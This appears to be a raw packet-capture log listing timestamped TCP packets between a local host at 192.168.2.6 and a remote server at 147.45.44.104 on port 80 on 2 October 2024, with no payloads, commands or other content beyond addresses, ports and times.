                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863558054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863570929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863570929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863584042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863595009 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863599062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863614082 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863620043 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863629103 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863642931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863656044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863665104 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863671064 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863687992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863711119 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863934994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863948107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.863961935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864001036 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864064932 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864078045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864089966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864101887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864104986 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864114046 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864124060 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864130020 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864149094 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864315987 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864331961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864345074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864360094 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864362955 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864384890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864495039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864509106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864520073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864535093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864536047 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864547968 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864558935 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864562035 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864578009 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864592075 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864598036 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864604950 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864618063 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864624977 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864633083 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864645958 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864646912 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864659071 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864670992 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864671946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864686012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864696026 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864700079 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864716053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864731073 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.864753962 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865389109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865401983 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865413904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865436077 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865436077 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865451097 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865463018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865477085 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865480900 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865489960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865500927 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865503073 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865520000 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865526915 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865536928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865549088 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865555048 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865573883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865585089 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865592003 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865605116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865607023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865611076 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865612984 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865622997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865629911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865636110 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865636110 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865643978 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865649939 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865670919 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.865689993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866235018 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866247892 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866259098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866271019 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866278887 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866292953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866301060 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866306067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866318941 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866333961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866344929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866349936 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866364956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866374016 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866379023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866394043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866405010 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866405964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866424084 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866430044 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866437912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866450071 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866461039 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866466045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866488934 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866859913 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866873980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866887093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866898060 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866906881 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.866935968 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903189898 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903215885 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903229952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903264999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903279066 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903321981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903333902 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903347015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903348923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903348923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903348923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.903414011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.944811106 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953469038 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953490973 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953506947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953517914 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953531981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953566074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953568935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953583956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953629971 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953672886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953685999 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953696966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953711033 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953716993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953725100 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953741074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953768969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953795910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953813076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953850031 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953857899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953869104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953881025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953892946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953905106 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953906059 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.953928947 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954091072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954102039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954113007 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954125881 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954137087 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954139948 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954149961 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954163074 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954163074 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954185009 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954210997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954263926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954277039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954318047 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954437017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954447985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954461098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954473019 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954484940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954498053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954498053 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954510927 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954521894 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954523087 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954539061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954545975 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954552889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954565048 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954571962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954596996 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954690933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954703093 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954709053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954735994 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954760075 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954821110 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954960108 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954971075 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.954982996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955001116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955013037 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955025911 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955034018 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955034018 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955039978 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955054045 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955059052 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955070972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955080032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955084085 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955096960 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955111980 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955122948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955123901 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955136061 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955148935 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955161095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955161095 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955194950 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955212116 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955379963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955404043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955415010 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955426931 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955435038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955440998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955449104 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955455065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955462933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955473900 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955521107 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955533981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955545902 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955558062 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955568075 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955571890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955578089 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955588102 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955600023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955600977 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955614090 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955622911 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955627918 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955641031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955648899 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955656052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955671072 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955682993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955686092 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.955705881 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956022024 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956032991 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956044912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956060886 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956070900 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956098080 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956275940 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956288099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956299067 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956311941 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956325054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956326008 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956338882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956340075 CEST4971180192.168.2.6147.45.44.104
